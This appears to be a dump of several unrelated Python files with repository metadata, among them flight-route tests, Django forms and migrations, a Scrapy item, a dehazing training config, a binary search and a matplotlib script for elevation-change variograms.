assert get_route['data'][0]['airline'] == {'name': 'United Airlines',
'2_digit_code': 'UA',
'3_digit_code': 'UAL',
'country': 'United States'}
def test_get_route_with_two_connections(self, app, data):
"""
Get best route with two connections when the airlines origin is
United Airlinesand the connection is Turkish Airlines
"""
from airflight.views.api.v1.flight.flight import FlightAPI
req = DummyRequest(method='GET')
req.params = MultiDict([('origin', 'YWH'), ('destination', 'ANK')])
get_route = FlightAPI(req).get_best_route()
assert len(get_route['data']) == 2
assert get_route['data'][0]['airline'] == {'name': 'United Airlines',
'2_digit_code': 'UA',
'3_digit_code': 'UAL',
'country': 'United States'}
assert get_route['data'][1]['airline'] == {'name': 'Turkish Airlines',
'2_digit_code': 'TK',
'3_digit_code': 'THY',
'country': 'Turkey'}
def test_get_route_when_exist_two_different_routes(self, app, data):
"""
Test when exist different routes
Route 1: (YWH -> YYZ) -> (YYZ -> ANK) -> (ANK -> ADA)
Route 2: (YWH -> ADA)
In this case the system chooses Route 2
"""
from airflight.views.api.v1.flight.flight import FlightAPI
req = DummyRequest(method='GET')
req.params = MultiDict([('origin', 'YWH'), ('destination', 'ADA')])
get_route = FlightAPI(req).get_best_route()
assert len(get_route['data']) == 1
def test_get_route_origin_is_the_same_as_destination(self, app):
from airflight.views.api.v1.flight.flight import FlightAPI
req = DummyRequest(method='GET')
req.params = MultiDict([('origin', 'YWH'), ('destination', 'YWH')])
with pytest.raises(OriginIsTheSameAsTheDestination):
FlightAPI(req).get_best_route()
| [
"[email protected]"
] | |
1b0521829af31e56cc0afc46aa3436c575e25528 | 2002287e40f4fc81a8d8742d6c1e7f11024c9666 | /todo_list/forms.py | 6670d2258ec4871e71c7f176582061323ee82c5c | [] | no_license | wahudong/Practise | 9393827f588632b3daac9d5c5fa53637a9e2e0e9 | 123251153f6e2adfb3ab6e9fbd18db80a54d9541 | refs/heads/main | 2023-01-29T19:55:17.628563 | 2020-12-04T20:41:04 | 2020-12-04T20:41:04 | 318,065,999 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 412 | py | from django import forms
from .models import List
from django.forms import ModelForm
from django.contrib.auth.forms import UserCreationForm
from django.contrib.auth.models import User
class ListForm(forms.ModelForm):
class Meta:
model = List
fields = ["item", "completed"]
class CreateUserForm(UserCreationForm):
class Meta:
model=User
fields = ['username','email','password1','password2'] | [
"[email protected]"
] | |
6793830f21ec324ddc11d54d5865424c10430a19 | 6a9b56464bf4e703ebe0039fb12caf7553c94a27 | /jdbook/jdbook/items.py | 586dbf21c31a21bf73aee594deb9517ec86e729e | [] | no_license | paul166/spider | 24136e9578fb5c5e956a27691e5065569c51806c | 6ee3962745183fc73c6efccca66d715db6210c9a | refs/heads/master | 2020-05-19T11:28:42.131481 | 2019-10-25T09:36:30 | 2019-10-25T09:36:30 | 176,266,753 | 1 | 0 | null | null | null | null | UTF-8 | Python | false | false | 619 | py | # -*- coding: utf-8 -*-
# Define here the models for your scraped items
#
# See documentation in:
# https://doc.scrapy.org/en/latest/topics/items.html
import scrapy
class JdbookItem(scrapy.Item):
# define the fields for your item here like:
# name = scrapy.Field()
b_cate=scrapy.Field()
s_cate = scrapy.Field()
book_img = scrapy.Field()
book_name= scrapy.Field()
book_author= scrapy.Field()
book_press = scrapy.Field()
book_publish_date = scrapy.Field()
book_sku = scrapy.Field()
book_price = scrapy.Field()
s_href = scrapy.Field()
comment = scrapy.Field()
| [
"[email protected]"
] | |
6fb6613372a31c455061abbd06c33ee822e892a9 | aa7622e006b67580cd5c6cc7c337a09dc8018b10 | /main.py | 07bf78ada0c68a77fed23607651ccdea62bdc0c0 | [] | no_license | MatthewMing11/LineAlg | f882a1da7dd2be049f887dc18d4906abfb08321b | d6d4ed972d8173f6bb3d40fb3afb7a32f39a6e5f | refs/heads/master | 2020-08-01T09:36:49.953460 | 2019-02-11T03:43:38 | 2019-02-11T03:43:38 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 785 | py | from display import *
from draw import *
screen = new_screen()
color = [ 0, 255, 0 ]
draw_line(250,250,0,0,screen,color)
draw_line(250,250,125,0,screen,color)
draw_line(250,250,250,0, screen,color)
draw_line(250,250,375,0,screen,color)
draw_line(250,250,500,0, screen,color)
draw_line(250,250,500,125,screen,color)
draw_line(250,250,500,250,screen,color)
draw_line(250,250,500,375,screen,color)
draw_line(250,250,500,500, screen,color)
draw_line(250,250,375,500,screen,color)
draw_line(250,250,250,500, screen,color)
draw_line(250,250,125,500,screen,color)
draw_line(250,250,0,500, screen,color)
draw_line(250,250,0,375,screen,color)
draw_line(250,250,0,250, screen,color)
draw_line(250,250,0,125,screen,color)
display(screen)
save_extension(screen, 'img.png')
| [
"[email protected]"
] | |
23c8b4b7b55de70e7470515732522e9c04f0a1bb | a95615ccf6f30a0ba64a2a1f797d6b42c8d8a0f1 | /manage.py | 1024ec5c416012906f668e1469cc10637a800bd4 | [] | no_license | abhishekasana/bitsyurl | 0e89cc856ca587fe5ad39afc83cd2c01176331e5 | 73782082f8714dacaca0411ab311850300f92307 | refs/heads/master | 2021-01-01T12:57:14.893499 | 2020-02-09T11:16:51 | 2020-02-09T11:16:51 | 239,289,147 | 1 | 0 | null | 2020-02-09T11:17:32 | 2020-02-09T10:59:01 | Python | UTF-8 | Python | false | false | 222 | py | from app import app
from flask_script import Manager, Server
manager = Manager(app)
server = Server(host='localhost', port='5000')
manager.add_command("runserver", server)
if __name__ == "__main__":
manager.run()
| [
"[email protected]"
] | |
70adf55e938e2f92c5e112ffa4e627bb586d69d9 | 53bd9c2c8c648069d2c735bba5fc58458e8ad9ea | /little-squid-dehaze/experiments/unet_aod_residual_ntire_config.py | e8438a1cc8b88d995caf8fd6cc38f75554285d7d | [] | no_license | zyh911/image_dehazing | d7842da987e569e015702d0ad7a4861f11a49db6 | 0e6c40f65b7ea27a668af674a30934f5d7bd41ee | refs/heads/master | 2020-04-01T14:42:53.678332 | 2019-06-11T03:55:21 | 2019-06-11T03:55:21 | 153,305,194 | 3 | 1 | null | null | null | null | UTF-8 | Python | false | false | 3,001 | py | #!/usr/bin/env python
# -*- coding:utf-8 -*-
# changed gpus
import os
import sys
sys.path.insert(0, '../../') # to be changed
# =================== config for train flow ============================================================================
DESC = 'MSE' # to be changed
experiment_name = os.path.splitext(__file__.split('/')[-1])[0]
INDOOR_OR_OUTDOOR_DIR = '/indoor'
# INDOOR_OR_OUTDOOR_DIR = '/outdoor'
PERSONAL_TASKS = '/zyh3/train_tasks' # personal
BASE_ROOT = '/root/group-competition' # base
TRAIN_ROOT = BASE_ROOT + PERSONAL_TASKS + '/' + experiment_name
MODEL_FOLDER = os.path.join(TRAIN_ROOT, 'models')
TRAIN_OUT_FOLDER = os.path.join(TRAIN_ROOT, 'train_out')
PEEK_OUT_FOLDER = os.path.join(TRAIN_ROOT, 'peek_out')
TEST_OUT_FOLDER = os.path.join(TRAIN_ROOT, 'test_out')
DATASET_DIR = BASE_ROOT + '/data/dehaze/NTIRE' + INDOOR_OR_OUTDOOR_DIR + '/train_val_crop'
DATASET_ID = 'aod_txt'
DATASET_TXT_DIR = BASE_ROOT + '/data/dehaze/NTIRE' + INDOOR_OR_OUTDOOR_DIR + '/train_val_crop'
# IMAGE_SITE_URL = 'http://172.16.3.247:8000/image-site/dataset/{dataset_name}?page=1&size=50'
# IMAGE_SITE_DATA_DIR = '/root/zyh3/ITS/ITS/train'
peek_images = [BASE_ROOT + '/data/dehaze/NTIRE' + INDOOR_OR_OUTDOOR_DIR + '/train_val_crop/train/haze/0.png', BASE_ROOT + '/data/dehaze/NTIRE' + INDOOR_OR_OUTDOOR_DIR + '/train_val_crop/train/haze/100.png']
test_input_dir = BASE_ROOT + '/data/dehaze/NTIRE' + INDOOR_OR_OUTDOOR_DIR + '/test/haze'
GPU_ID = None
epochs = 40
batch_size = 32
start_epoch = 1
save_snapshot_interval_epoch = 1
peek_interval_epoch = 1
save_train_hr_interval_epoch = 1
loss_average_win_size = 2
validate_interval_epoch = 1
validate_batch_size = 4
plot_loss_start_epoch = 1
only_validate = False #
from visdom import Visdom
vis = Visdom(server='http://127.0.0.1', port=8097)
# =================== config for model and dataset =====================================================================
from squid.data import Photo2PhotoData
from squid.data import RandomCropPhoto2PhotoData
from squid.model import SuperviseModel
import torch
import torch.nn as nn
from squid.loss import VGGLoss
from squid.net import Unet_AOD_Residual_Net
target_net = Unet_AOD_Residual_Net()
target_net = nn.DataParallel(target_net).cuda()
model = SuperviseModel({
'net': target_net,
'optimizer': torch.optim.Adam([{'name':'net_params', 'params':target_net.parameters(), 'base_lr':1e-5}], betas=(0.9, 0.999), weight_decay=0.0005),
'lr_step_ratio': 0.5,
'lr_step_size': 8,
'supervise':{
'out': {'MSE_loss': {'obj': nn.MSELoss(size_average=True), 'factor':1.0, 'weight':1.0}},
},
'metrics': {}
})
train_dataset = Photo2PhotoData({
'data_root': DATASET_DIR,
'desc_file_path': os.path.join(DATASET_TXT_DIR, DATASET_ID, 'train.txt'),
})
valid_dataset = Photo2PhotoData({
'data_root': DATASET_DIR,
'desc_file_path': os.path.join(DATASET_TXT_DIR, DATASET_ID, 'val.txt'),
})
| [
"[email protected]"
] | |
6d61fa26e303c87984b52441d14bccdc9ace0fc9 | f6ab35c3c5f899df0c0ee074de8f8df30227ffe2 | /main/tests/__init__.py | a4a16e0725465c5c924698834a01c2a7b287bdfc | [
"MIT"
] | permissive | josylad/RoomScout | f3614291bbfdd226110e038fb60d593ab3093c7e | a3d067dd67dfdd43702ea2e89064213dbd469157 | refs/heads/master | 2020-12-27T09:22:47.486710 | 2020-02-20T10:18:05 | 2020-02-20T10:18:05 | 237,850,614 | 0 | 0 | MIT | 2020-02-20T10:18:06 | 2020-02-02T23:08:10 | Python | UTF-8 | Python | false | false | 100 | py | import unittest
def suite():
return unittest.TestLoader().discover("main.tests", pattern="*.py")
| [
"[email protected]"
] | |
d64ff73bf99cd86f95dfb7e7e2f1e541175e5a4c | b7f033c9811def6f5097463df86bc2f47c16247a | /app/migrations/0001_initial.py | 301cbbb4ad26635117beeff3d0b5fa8d12cea7ca | [] | no_license | Patton-Burge/django-dog-store | e6effb100f3a3312263bfc6e6f3fc9060d6e0a5a | c92ee19e3d23a7098744e466a2abc415a23ca068 | refs/heads/master | 2020-09-09T16:19:06.211907 | 2019-11-15T21:38:13 | 2019-11-15T21:38:13 | 221,494,695 | 0 | 0 | null | 2019-11-13T15:45:17 | 2019-11-13T15:45:16 | null | UTF-8 | Python | false | false | 1,490 | py | # Generated by Django 2.2.5 on 2019-11-13 16:05
from django.db import migrations, models
import django.db.models.deletion
class Migration(migrations.Migration):
initial = True
dependencies = [
]
operations = [
migrations.CreateModel(
name='DogProduct',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('name', models.TextField()),
('product_type', models.TextField()),
('dog_size', models.TextField()),
('price', models.FloatField()),
('quantity', models.IntegerField()),
],
),
migrations.CreateModel(
name='DogTag',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('owner_name', models.TextField()),
('dog_name', models.TextField()),
('dog_birthday', models.DateField()),
],
),
migrations.CreateModel(
name='Purchase',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('purchased_at', models.DateTimeField()),
('dog_product', models.ForeignKey(on_delete=django.db.models.deletion.PROTECT, to='app.DogProduct')),
],
),
]
| [
"[email protected]"
] | |
26bc93508223d7fcff7aba2d9d230d60e8a72398 | eceeec97c971a3ee8a09dce58d5630a058d9f8cf | /app.py | 5262d7dd487f6b9aee90132b7477219131e02840 | [] | no_license | hamelsmu/hello-world-deploy | a9ffba8c98b1b293946609c99d01db6dede85d4b | d94fd2fb71627f898b2f9496a499451bffca000d | refs/heads/master | 2020-04-14T04:01:23.306727 | 2018-12-31T00:55:53 | 2018-12-31T00:55:53 | 163,623,591 | 2 | 0 | null | 2019-04-14T04:36:41 | 2018-12-30T23:05:03 | Python | UTF-8 | Python | false | false | 210 | py | import os
from flask import Flask, session, render_template, session, redirect, url_for, request
app = Flask(__name__)
@app.route("/", methods=["GET", "POST"])
def index():
return 'hello world deploy!!!' | [
"[email protected]"
] | |
4d51c6e91ba602fe3942d7b108827e8caa5bb051 | 43feb23c11c6e0b8d5dc868cee1deca06067b44e | /read_statistics/utils.py | f0a4f3ae102040c90df743b9644034d480409c7f | [] | no_license | oldestcrab/my_blog_2 | 6c7190571fe2fad70169b36d9159e1daa5aff094 | 47aeb699992c8ca949edae59e2157216c6522a8c | refs/heads/master | 2023-05-01T11:17:55.428536 | 2019-09-29T09:08:02 | 2019-09-29T09:08:02 | 210,355,178 | 0 | 0 | null | 2023-04-21T20:37:59 | 2019-09-23T12:55:48 | Python | UTF-8 | Python | false | false | 3,010 | py | import datetime
from django.contrib.contenttypes.models import ContentType
from .models import ReadNum, ReadNumDetail
from django.utils import timezone
from django.db.models import Sum
from blog.models import Blog
def read_statistics_once_read(request, obj):
"""判断是否需要+1或者创建模型阅读数
:param request: request
:param obj: 模型对象
:return: cookies key,表示已阅读
"""
content_type = ContentType.objects.get_for_model(obj)
# 设置cookies key
key = f'{content_type.model}_{obj.pk}_read'
# 如果cookies没有相关信息,则阅读数+1
if not request.COOKIES.get(key):
# 博客阅读数量模型,+1或者创建博客阅读数
readnum, create = ReadNum.objects.get_or_create(content_type=content_type, object_id=obj.pk)
readnum.read_num += 1
readnum.save()
# 当前时间
date = timezone.now().date()
# 博客详细阅读数量模型,+1或者创建当天的博客阅读数
readNumDetail, create = ReadNumDetail.objects.get_or_create(content_type=content_type, object_id=obj.pk, date=date)
readNumDetail.read_num += 1
readNumDetail.save()
return key
def get_seven_days_read_data(content_type):
"""获取前七天的相关模型阅读数量
:param content_type: content_type
:return: 前七天的日期,以及前七天的相关模型阅读数量列表
"""
# 获取今天日期
today = timezone.now().date()
days = []
read_nums = []
# 遍历前7天
for i in range(7, 0, -1):
day = today - datetime.timedelta(days=i)
days.append(day.strftime('%m/%d'))
result_detail = ReadNumDetail.objects.filter(content_type=content_type, date=day)
# 获取某天的总博客阅读数量
result_blog = result_detail.aggregate(read_count=Sum('read_num'))
read_nums.append(result_blog['read_count'] or 0)
return days, read_nums
def get_oneday_hot_blogs(content_type, date):
"""获取某一天的前7篇博客以及当天浏览量
:param content_type: content_type
:param date: 某一天的日期
:return: 某一天的前7篇博客以及当天浏览量
"""
# 获取阅读量排行前7的博客
today_hot_blogs = ReadNumDetail.objects.filter(content_type=content_type, date=date).order_by('-read_num')[:7]
# print(today_hot_blogs)
return today_hot_blogs
def get_range_day_hot_blogs(days:int):
"""获取前某天范围内的热门博客
:param days: 前几天范围内的热门阅读,前7天:7,当天:0
:return: 前某天范围内的热门博客字典
"""
# 前某天的日期
date = timezone.now().date() - datetime.timedelta(days)
# 热门博客字典
hot_blogs_data = Blog.objects.filter(read_num_details__date__gte=date) \
.values('id', 'title').annotate(read_num_detail=Sum('read_num_details__read_num')).order_by('-read_num_detail')[:7]
return hot_blogs_data | [
"[email protected]"
] | |
f0fac03763cb5c15834f9a17d30425b9cd6f7701 | 05967b90707fdeea9d7ff630ab836b6923def3b4 | /BinarySearch.py | 30ee36c198eed21a882143bc9568e0ea1b4e2ead | [] | no_license | nehavarshney8/Data-Structures-and-Algorithms | 078b474c9761eeac4a8c949c17adc005edc4aaac | 1a49b8d6d0f1e55f742f30313da9ad8fc6585816 | refs/heads/master | 2020-12-21T10:49:10.041503 | 2019-09-04T12:36:12 | 2019-09-04T12:36:12 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,040 | py | import math
def bs(ls, key, low, high):
if low==high and ls[low]==key:
return low
elif low==high and ls[low]!=key:
return -1
elif high<low:
return -1
else:
mid=math.floor((low+high)/2)
if key==ls[mid]:
return mid
elif key>ls[mid]:
low=mid+1
return bs(ls, key, low, high)
elif key<ls[mid]:
high=mid-1
return bs(ls, key, low, high)
def __main__():
import math
totalElements=input("Enter the total number of elements followed by elements in sequence").split()
ele=totalElements[1:]
seq=[]
for elements in ele:
seq.append(eval(elements))
searchEle=input("Enter the total search elements and elements in order").split()
elem=searchEle[1:]
searchSeq=[]
for elements in elem:
searchSeq.append(eval(elements))
f=[]
for element in searchSeq:
f.append(bs(seq, element, 0, len(seq)-1))
for element in f:
print(element, end=' ')
__main__() | [
"[email protected]"
] | |
9f2cd991b54ae16cb7bfa3a40149fc9e647a39a0 | 7edc9ca35113fc2169828db0cad5b379e0f61813 | /figures/fig_ed5_tinterpcorr_hrdems_smallfonts.py | 6e5efe909a5500d8f41222235c8d9529f286637f | [
"MIT"
] | permissive | LuErShuai/ww_tvol_study | b97a74739fcfbe7d7fb867a6d4fe64df6a125adb | f29fc2fca358aa169f6b7cc790e6b6f9f8b55c6f | refs/heads/main | 2023-05-01T23:05:30.916533 | 2021-05-26T19:41:00 | 2021-05-26T19:41:00 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 21,339 | py |
import os, sys
import numpy as np
import pandas as pd
import matplotlib.pyplot as plt
import scipy.optimize
plt.rcParams.update({'font.size': 5})
plt.rcParams.update({'lines.linewidth':0.35})
plt.rcParams.update({'axes.linewidth':0.35})
plt.rcParams.update({'lines.markersize':2.5})
plt.rcParams.update({'axes.labelpad':1.5})
all_csv = '/home/atom/ongoing/work_worldwide/validation/tcorr/tinterp_corr_deseas_agg_all.csv'
# all_csv = '/home/atom/ongoing/work_worldwide/validation/tinterp_corr_agg_all.csv'
df = pd.read_csv(all_csv)
# df = df[df.reg==5]
cutoffs = list(set(list(df.cutoff)))
dts = sorted(list(set(list(df.nb_dt))))
col = ['tab:orange','tab:blue','tab:olive','tab:red','tab:cyan','tab:brown','tab:gray','tab:pink','tab:purple']
#plot covar by lag
# for dt in dts:
#
# df_dt = df[df.nb_dt == dt]
#
# for cutoff in cutoffs:
# df_c = df_dt[df_dt.cutoff == cutoff]
#
# if cutoff == 10000:
# plt.scatter(df_c.bins.values[1],df_c.exp.values[1],color=col[dts.index(dt)],label=str(dt))
# plt.scatter(df_c.bins.values[20],df_c.exp.values[20],color=col[dts.index(dt)])
# plt.scatter(df_c.bins.values[50],df_c.exp.values[50],color=col[dts.index(dt)])
# elif cutoff == 100000:
# plt.scatter(df_c.bins.values[20],df_c.exp.values[20],color=col[dts.index(dt)])
# plt.scatter(df_c.bins.values[50],df_c.exp.values[50],color=col[dts.index(dt)])
# else:
# plt.scatter(df_c.bins.values[20],df_c.exp.values[20],color=col[dts.index(dt)])
# plt.scatter(df_c.bins.values[50],df_c.exp.values[50],color=col[dts.index(dt)])
#
# plt.ylim([0,50])
# plt.xscale('log')
# plt.legend()
#plot covar by dt
dts = sorted(dts)
dts.remove(540.)
dts.remove(900.)
dts.remove(1750.)
dts.remove(2250.)
arr_res = np.zeros((len(dts),7))
arr_count = np.zeros((len(dts),7))
for dt in dts:
df_dt = df[df.nb_dt == dt]
for cutoff in cutoffs:
df_c = df_dt[df_dt.cutoff == cutoff]
if cutoff == 10000:
arr_res[dts.index(dt),0]=np.nanmean(df_c.exp.values[1:2])
arr_count[dts.index(dt),0]=np.nanmean(df_c['count'].values[1:2])
arr_res[dts.index(dt), 1] = np.nanmean(df_c.exp.values[20 - 10:20 + 10])
arr_count[dts.index(dt), 1] = np.nanmean(df_c['count'].values[20 - 10:20 + 10])
arr_res[dts.index(dt), 2] = np.nanmean(df_c.exp.values[50 - 10:50 + 10])
arr_count[dts.index(dt), 2] = np.nanmean(df_c['count'].values[50 - 10:50 + 10])
elif cutoff == 100000:
arr_res[dts.index(dt),3]=np.nanmean(df_c.exp.values[20-5:20+20])
arr_count[dts.index(dt),3]=np.nanmean(df_c['count'].values[20-10:20+10])
arr_res[dts.index(dt),4]=np.nanmean(df_c.exp.values[50-10:50+10])
arr_count[dts.index(dt),4]=np.nanmean(df_c['count'].values[50-10:50+10])
elif cutoff == 1000000:
arr_res[dts.index(dt),5]=np.nanmean(df_c.exp.values[20-10:20+30])
arr_count[dts.index(dt),5]=np.nanmean(df_c['count'].values[20-10:20+30])
arr_res[dts.index(dt),6]=np.nanmean(df_c.exp.values[50-40:50+40])
arr_count[dts.index(dt),6]=np.nanmean(df_c['count'].values[50-40:50+40])
arr_res[arr_count<100]=np.nan
# for dt in dts:
#
# df_dt = df[df.nb_dt == dt]
#
# for cutoff in cutoffs:
# df_c = df_dt[df_dt.cutoff == cutoff]
#
# if cutoff == 10000:
# plt.scatter(dt,df_c.exp.values[1],color=col[0])
# plt.scatter(dt,np.nanmean(df_c.exp.values[20-10:20+10]),color=col[1])
# plt.scatter(dt,np.nanmean(df_c.exp.values[50-10:50+10]),color=col[2])
# elif cutoff == 100000:
# plt.scatter(dt,np.nanmean(df_c.exp.values[20-10:20+10]),color=col[3])
# plt.scatter(dt,np.nanmean(df_c.exp.values[50-10:50+10]),color=col[4])
# else:
# plt.scatter(dt,np.nanmean(df_c.exp.values[20-10:20+10]),color=col[5])
# plt.scatter(dt,np.nanmean(df_c.exp.values[50-10:50+10]),color=col[6])
fig = plt.figure(figsize=(7.2,7.5))
# plt.subplots_adjust(hspace=0.3)
grid = plt.GridSpec(6, 13, wspace=0.05, hspace=0.5)
ax = fig.add_subplot(grid[:3,:2])
# ax = fig.add_subplot(2, 1, 1)
vario = df[df.nb_dt == 720.]
vec_bins = []
vec_exp = []
vgm1 = vario[vario.cutoff == 10000]
vgm1 = vgm1[vgm1.bins<3000]
for i in range(6):
vec_bins += [np.nanmean(vgm1.bins.values[0+i*5:5+i*5])]
vec_exp += [np.nanmean(vgm1.exp.values[0+i*5:5+i*5])]
# vec_bins += vgm1.bins.tolist()
# vec_exp += vgm1.exp.tolist()
vgm1 = vario[vario.cutoff == 100000]
vgm1 = vgm1[np.logical_and(vgm1.bins>3000,vgm1.bins<30000)]
vec_bins += vgm1.bins.tolist()
vec_exp += vgm1.exp.tolist()
vgm1 = vario[vario.cutoff == 1000000]
vgm1 = vgm1[vgm1.bins>30000]
for i in range(18):
vec_bins += [np.nanmean(vgm1.bins.values[0+i*5:5+i*5])]
vec_exp += [np.nanmean(vgm1.exp.values[0+i*5:5+i*5])]
vec_bins = np.array(vec_bins)
vec_exp=np.array(vec_exp)
def sph_var(c0,c1,a1,h):
if h < a1:
vgm = c0 + c1 * (3 / 2 * h / a1-1 / 2 * (h / a1) ** 3)
else:
vgm = c0 + c1
return vgm
vect = np.array(list(np.arange(0,3000,1)) + list(np.arange(3000,30000,10)) + list(np.arange(30000,3000000,100)))
mod = []
c1s = [0] + list(arr_res[dts.index(720.),:])
a1s = [0.2,2,5,20,50,200]
#find unbiased sills
list_c = []
for j in range(len(a1s)):
print('Range:' + str(a1s[-1 - j]))
c = c1s[-2 - j] - c1s[-3 - j]
print(c)
for k in range(j):
# c -= sph_var(0, list_c[k], a1s[-1 - k] * 1000, a1s[-1 - j] * 1000)
if j>5:
c -= (sph_var(0, list_c[k], a1s[-1 - k] * 1000, a1s[-1 - j] * 1000) - sph_var(0,list_c[k], a1s[-1-k]*1000,a1s[-2-j]*1000))
elif j==5:
c -= sph_var(0, list_c[k], a1s[-1 - k] * 1000, a1s[-1 - j] * 1000)
c = max(0, c)
list_c.append(c)
list_c.reverse()
#compute variogram
for i in range(len(vect)):
val = 0
for j in range(len(a1s)):
val += sph_var(0,list_c[j],a1s[j]*1000,vect[i])
mod.append(val)
mod = np.array(mod)
ax.scatter(vec_bins/1000,vec_exp,color='black',marker='x')
ax.set_xlim((0,3))
ax.set_ylim((0,55))
ax.set_xticks([0,1,2])
ax.text(0.075, 0.975, 'a', transform=ax.transAxes,
fontsize=8, fontweight='bold', va='top', ha='left')
ax.vlines(0.15,0,60,color=col[0],linewidth=0.5)
ax.text(0.4,c1s[1]-5,'$s_0$',color=col[0],ha='left',va='bottom',bbox= dict(boxstyle='round', facecolor='white', alpha=0.7,linewidth=0.35))
ax.vlines(2,0,60,color=col[1],linewidth=0.5)
ax.text(2.2,c1s[2]-5,'$s_1$',color=col[1],ha='left',va='bottom',bbox= dict(boxstyle='round', facecolor='white', alpha=0.7,linewidth=0.35))
ax.plot(vect/1000,mod,color='dimgrey',linestyle='dashed')
# ax.hlines(25,0,500,colors='black',linestyles='dotted')
ax.set_ylabel('Variance of elevation differences (m$^2$)')
ax.tick_params(width=0.35,length=2.5)
ax = fig.add_subplot(grid[:3,4:6])
ax.scatter(vec_bins/1000,vec_exp,color='black',marker='x')
ax.set_xlim((0,550))
ax.set_ylim((0,55))
ax.set_xticks([0,100,200,300,400,500])
# ax.text(0.075, 0.975, 'C', transform=ax.transAxes,
# fontsize=14, fontweight='bold', va='top', ha='left')
ax.vlines(50,0,60,colors=[col[4]],linewidth=0.5)
ax.text(70,c1s[5]-5,'$s_4$',color=col[4],ha='left',va='bottom',bbox= dict(boxstyle='round', facecolor='white', alpha=0.7,linewidth=0.35))
ax.vlines(200,0,60,colors=[col[5]],linewidth=0.5)
ax.text(220,c1s[6]-7,'$s_5$',color=col[5],ha='left',va='bottom',bbox= dict(boxstyle='round', facecolor='white', alpha=0.7,linewidth=0.35))
ax.vlines(500,0,60,colors=[col[6]],linewidth=0.5)
ax.text(480,c1s[6]-7,'$s_6$',color=col[6],ha='right',va='bottom',bbox= dict(boxstyle='round', facecolor='white', alpha=0.7,linewidth=0.35))
ax.plot(vect/1000,mod,color='dimgrey',linestyle='dashed')
# ax.hlines(25,0,500,colors='black',linestyles='dotted')
ax.tick_params(width=0.35,length=2.5)
ax.set_yticks([])
ax = fig.add_subplot(grid[:3,2:4])
ax.scatter(vec_bins/1000,vec_exp,color='black',marker='x')
ax.set_xlim((0,30))
ax.set_ylim((0,55))
ax.set_xticks([0,10,20])
# ax.text(0.075, 0.975, 'B', transform=ax.transAxes,
# fontsize=14, fontweight='bold', va='top', ha='left')
ax.vlines(5,0,60,color=col[2],linewidth=0.5)
ax.text(6,c1s[3]-5,'$s_2$',color=col[2],ha='left',va='bottom',bbox= dict(boxstyle='round', facecolor='white', alpha=0.7,linewidth=0.35))
ax.vlines(20,0,60,color=col[3],linewidth=0.5)
ax.text(21,c1s[4]-5,'$s_3$',color=col[3],ha='left',va='bottom',bbox= dict(boxstyle='round', facecolor='white', alpha=0.7,linewidth=0.35))
ax.plot(vect/1000,mod,color='dimgrey',linestyle='dashed')
# ax.hlines(25,0,500,colors='black',linestyles='dotted',label='Global mean variance')
ax.set_yticks([])
ax.set_xlabel('Spatial lag (km)')
ax.plot([],[],color='grey',linestyle='dashed',label='Sum of spherical models')
ax.scatter([],[],color='black',marker='x',label='Empirical variance')
ax.vlines([],[],[],color=col[0],label='0.15 km',linewidth=0.5)
ax.vlines([],[],[],color=col[1],label='2 km',linewidth=0.5)
ax.vlines([],[],[],color=col[2],label='5 km',linewidth=0.5)
ax.vlines([],[],[],color=col[3],label='20 km',linewidth=0.5)
ax.vlines([],[],[],color=col[4],label='50 km',linewidth=0.5)
ax.vlines([],[],[],color=col[5],label='200 km',linewidth=0.5)
ax.vlines([],[],[],color=col[6],label='500 km',linewidth=0.5)
ax.legend(loc='lower center',ncol=3,title='Spatial correlations of GP elevation at $\Delta t$ = 720 days',title_fontsize=6,columnspacing=0.5)
ax.tick_params(width=0.35,length=2.5)
ax = fig.add_subplot(grid[3:,:6])
coefs_list = []
y = None
# arr_res[0:1,4]=25
# arr_res[arr_res>25] = 25.
# arr_res[4,2]=np.nan
# arr_res[3:,3]=np.nan
# arr_res[0,3]=25.
# arr_res[0,3:] = np.nan
for i in [0,1,2,3,4,5,6]:
# i=0
# arr_res[-1,0]=np.nan
coefs , _ = scipy.optimize.curve_fit(lambda t,a,b:a*t+b, np.array(dts)[~np.isnan(arr_res[:,i])], np.sqrt(arr_res[:,i][~np.isnan(arr_res[:,i])]))
coefs_list.append(coefs)
x = np.arange(0, 3000, 1)
if y is not None:
y0 = y
else:
y0 = x*0
y = coefs[0]*x+coefs[1] #- 2*np.sin(x/365.2224*np.pi)**2
# y[y>25]=25.
# y[y<y0]=y0[y<y0]
y = y
ax.plot(x,y**2 -2*np.sin(x/365.2224*2*np.pi)**2,color=col[i])
ax.fill_between(x,y0**2 -2*np.sin(x/365.2224*2*np.pi)**2,y**2 -2*np.sin(x/365.2224*2*np.pi)**2,color = col[i],alpha=0.2)
# ax.fill_between(x,40*np.ones(len(x)),y,color='tab:gray')
# arr_res[0,3:]=25.
for i in [0,1,2,3,4,5,6]:
ax.scatter(dts,arr_res[:,i],color=col[i])
# ax.hlines(25,0,3000,linestyles='dashed',color='tab:gray')
ax.plot([],[],color='black',label='Quadratic\nsin fit')
ax.fill_between([],[],color=col[0],label='0.15 km')
ax.fill_between([],[],color=col[1],label='2 km')
ax.fill_between([],[],color=col[2],label='5 km')
ax.fill_between([],[],color=col[3],label='20 km')
ax.scatter([],[],color='black',label='Empirical\nvariance')
ax.fill_between([],[],color=col[4],label='50 km')
ax.fill_between([],[],color=col[5],label='200 km')
ax.fill_between([],[],color=col[6],label='500 km')
ax.set_xlim([0,1500])
ax.set_ylim([0,60])
ax.set_ylabel('Variance of elevation differences (m$^{2}$)')
ax.set_xlabel('Days to closest observation $\Delta t$')
ax.vlines(720,0,100,colors='black',linestyles='dashed')
ax.text(800,5,'$\overline{s_{0}(\Delta t)}$: correlated until 0.15 km',bbox= dict(boxstyle='round', facecolor='white', alpha=0.7,linewidth=0.35),color='tab:orange')
ax.text(900,24,'$s_{1}(\Delta t)$: correlated until 2 km',bbox= dict(boxstyle='round', facecolor='white', alpha=0.7,linewidth=0.35),color='tab:blue')
ax.text(1250,38,'$s_{3}(\Delta t)$',bbox= dict(boxstyle='round', facecolor='white', alpha=0.7,linewidth=0.35),color='tab:red')
